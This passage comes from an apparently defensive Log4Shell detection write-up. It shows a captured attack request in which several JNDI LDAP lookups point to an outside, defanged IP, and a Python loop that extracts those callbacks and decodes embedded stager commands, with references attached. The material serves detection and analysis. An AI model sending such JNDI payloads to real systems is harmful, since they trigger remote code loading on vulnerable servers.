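    'GET /$%7Bjndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4dd5000002ed8b66100000000f8a500%7D?${jndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4dd5000012ed8b661000000007b0383}=${jndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4dd5000022ed8b661000000005e60bd} HTTP/1.1" 400 392 "${jndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4dd5000082ed8b661000000008d7023}',
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        for hit in find_jndi(line):
            print(f'{hit["scheme"]}://{hit["host"]}:{hit["port"]}{hit["path"]}')
            if hit["command"]:
                print("  decoded command:", hit["command"])
```

Running the file prints one resolved callback per lookup (four for the percent-encoded LeakIX-style line, since it carries a lookup in the path, two query parameters and the User-Agent). Note that the decoded command comes out with undefanged addresses: the attacker's Base64 encodes the real stager IP and the real victim address, so treat that output as live indicators.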

References

https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
https://piyolog.hatenadiary.jp/entry/2021/12/13/045541
